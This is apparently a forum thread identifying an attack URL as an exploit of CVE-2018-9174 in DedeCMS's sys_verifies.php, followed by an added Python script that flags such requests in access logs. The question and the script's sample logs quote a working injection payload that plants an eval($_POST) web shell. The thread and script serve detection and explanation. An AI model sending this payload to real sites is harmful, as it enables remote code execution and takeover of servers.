Direct injection attacks?
https://www.example.com/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[ysy]);die();//'

I have seen many attacks like that. Which security is in danger in this example?
It appears to be an attack on a vulnerability in DedeCMS, a Chinese open source CMS. A list of vulnerabilities for DedeCMS can be viewed here: Dedecms : Security vulnerabilities

The arbitrary PHP code execution vulnerability being targeted here is in that list and can be viewed here: CVE-2018-9174 : sys_verifies.php in DedeCMS 5.7 allows remote attackers to execute arbitrary PHP code via the refiles array parameter, b
Thanks @fuzzylogic! @toplisek please let us know if you have any further questions or concerns in regards to this.
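A detection sketch for the request pattern discussed in this thread, added here as an example and not part of the original posts or of DedeCMS: it scans access-log lines for requests to sys_verifies.php whose refiles[...] values are anything other than a plain file path. The log lines, IP addresses and the allowed-character rule are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate refiles[...] value is a plain relative file path.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_./-]*$")
# Request field of a common/combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_refiles(target):
    """Return refiles[...] values in a request target that are not plain paths."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/sys_verifies.php"):
        return []
    # parse_qsl percent-decodes names and values, so %22 is seen as '"'.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return [value for name, value in params
            if name.lower().startswith("refiles[") and not SAFE_VALUE.match(value)]

def scan(lines):
    """Return (client_ip, offending_values) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            bad = suspicious_refiles(match.group(1))
            if bad:
                hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log lines (documentation IP ranges). The first is modelled
# on the request quoted in the question; the second percent-encodes the brackets.
SAMPLE_LOG = [
    r'203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /uploads/dede/sys_verifies.php'
    r'?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[ysy]);die();// HTTP/1.1" 200 0',
    r'198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /dede/sys_verifies.php'
    r'?action=getfiles&refiles%5B0%5D=%5C%22 HTTP/1.1" 200 0',
    r'198.51.100.40 - - [01/Jan/2024:10:00:09 +0000] "GET /dede/sys_verifies.php'
    r'?action=getfiles&refiles[0]=include/common.inc.php HTTP/1.1" 200 12',
    r'198.51.100.40 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?refiles[0]=%22 HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for ip, values in scan(SAMPLE_LOG):
        print(ip, values)
```

A hit only shows that the request was received; whether the site was affected depends on the installed DedeCMS version and on whether the script is reachable.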